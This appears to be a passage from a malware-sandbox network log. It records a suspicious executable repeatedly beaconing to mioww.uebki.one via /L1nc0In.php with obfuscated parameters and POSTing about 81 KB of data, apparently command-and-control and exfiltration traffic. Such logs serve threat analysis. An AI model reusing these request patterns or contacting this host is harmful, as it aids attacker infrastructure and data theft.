                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OYRJmaMVQ6Wc8wxsXIQ1fqSjFP0w5ikRoaUlfW0e8N1TGr5jHjU91Sfn9Gt4095O3QUPv1VxLkx7UBwFTq2CtMK8siILqNHmkJ%2FBDOKvHNic3ZN9PHN%2FAflambRplzhUmPo%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d8e2b08c466-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0
                              Aug 31, 2024 10:11:59.313194990 CEST1257OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&ca3c68deb473a887593651d6a340f1bb=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:11:59.584100008 CEST | 633 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:11:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUeoOiJJXQ%2FfqnEUyqi%2BRoyz%2FShgoKI1K6YGnXZxaFuVmPG7GrVjZLKkC%2B6CZjLd0o%2B3Neoeh5Pmj1eMw%2BlOC%2FbJ0wgbzw0%2FmWO%2F%2FBtpQQblyIzF%2FHw7LreTgddbSYhdYLE%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d900c28c466-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.4 | 49732 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:11:59.768696070 CEST708OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&84ccbc5ddc4286bb9be5ede77b20cbca=QX9JSUNJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5kjZkR2MjJWYlVzYhV2Y0QWZ5M2MyMzYxkTMjBzY2cTNkFTO5QTYxIiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W HTTP/1.1
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:00.448710918 CEST | 617 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQh%2FYGBu5aYm5lprEsX8u3jxZU%2FzIAOihLXUshhaVkinmMIQdeOuVZiC%2BYz2yfHcjEz9DnR7nP0cyTWR6zMDNwtLeskcuFmXsvthnTGLZHupxdyMk2HaFHRhwki9gX0Xj6g%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d953f727c87-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              3 | 192.168.2.4 | 49733 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:00.463371038 CEST512OUTPOST /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryLi196lcbgF3BNosl
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                              Host: mioww.uebki.one
                              Content-Length: 81424
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:00.821901083 CEST12360OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 4c 69 31 39 36 6c 63 62 67 46 33 42 4e 6f 73 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61
                              Data Ascii: ------------WebKitFormBoundaryLi196lcbgF3BNoslContent-Disposition: form-data; name="28d68c3c3fcc342eb999bb72b34f8113"iFjY2IGZkdTY0M2M5EjM1YGZiNDMhZTNhFGZ0QzY0YjZkBjY2YmYx0SNwgTZ1ADMihjZjFTNxQGMxkDZyMDOhlzMiJzY5QWOiFGNycjYhFmM----------
                              Aug 31, 2024 10:12:00.928589106 CEST | 25 | IN | HTTP/1.1 100 Continue
                              Aug 31, 2024 10:12:01.556022882 CEST | 619 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQyuo1va4ENMT%2F5XOFAo4b1OykkD%2BY8vuHi6Ss%2FCBxBKXlUxpSzEvt4HFgz4htyscy6nuSg0gmF0LQtjdgND3sBlcLp46m2HdkqGpi%2FtNfCd9FFFvG9W6JZ5OdlJWtqoMpg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d997e4c4379-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.4 | 49734 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:03.921220064 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:04.650789976 CEST | 723 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMPPUFyYaymkheWLqTEI4IoitCv1tJ2Cs4clKvBjkYlJ1kNm3Gw5KDps8PH5qtRkctGXOIffqnpfADBTsbno8OcGkabc7%2Fs5LubHi8vx1feI3XcYJyypVMCbfkLI4JDW5EU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8daf0df97d0b-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              5 | 192.168.2.4 | 49735 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:09.671117067 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:10.393224955 CEST | 733 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:10 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbQouBR7U9dTTdKOzjTD%2B7LtOhVamfu0jDF2%2FzEA7201FVNEiE1rQUwif89Zedb5VBULoSsujhb0s%2Bl3v70vG%2Fli9X1giKpD1Eptn8j3aGaVNEb%2F5gc0FreNesiaaxtr%2BIs%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8dd2ee370f6f-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              6 | 192.168.2.4 | 49742 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:15.405662060 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:16.159619093 CEST | 727 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:16 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZbgSScnaZN%2F9xWLHJPyfgcpt%2F0CyxUj%2FoLHJT6K8TmNB1bK5SROfmvaLYFvm7L7gNUKmynbD0tFDORwAKEkESZ2UUv4Js01wts4zwISetu2wiRUESGudoh6SPIffcBECH94%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8df6dd448c18-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              7 | 192.168.2.4 | 49743 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:21.171314955 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:21.914422989 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:21 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZUxN6arH%2BRA9tUswXwC5E0SL%2FFoGlJg2OhdqL%2FjnPHKI2Bjnwi9l9eWOkZDIt5%2FYABJVtnqkjAHAmgKxGP3tEKbLUV1PxSMwvmAiuw%2FpoTPJZmHzot6oSw5CEtOtrRjBfyw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8e1acbf8431a-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              8 | 192.168.2.4 | 49744 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:26.937011003 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:12:27.670838118 CEST | 727 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:27 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xIHSQsWZAFJ3h9ZWYhEdBR%2FYj17KEoCbbles1Qig2%2FuDstIan1RlAnb5Cix8RA82w%2B0iJfzzJ4nZmsJtUmhWKXDP1mk8Tr2grfhKXGruhBZzShKv6cxHMi4ZheN0Smgn2RE%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8e3eda14c360-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              9 | 192.168.2.4 | 49745 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:32.686731100 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:12:33.417253971 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:12:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vurY3Hk2F3Kf%2B8S9AzywRtoKX0u1wlVo7RUKL0eOvvYIh7uWUOzzdMSwDJatg6XjpJ%2BRmagBH%2FuZhas0UunwSXL0VfDNPQirOw2qHqxoMADxSVZ7%2FhKaUIYQrDDcN1fy2lY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8e62daa0c344-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              10 | 192.168.2.4 | 49746 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:12:38.452549934 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
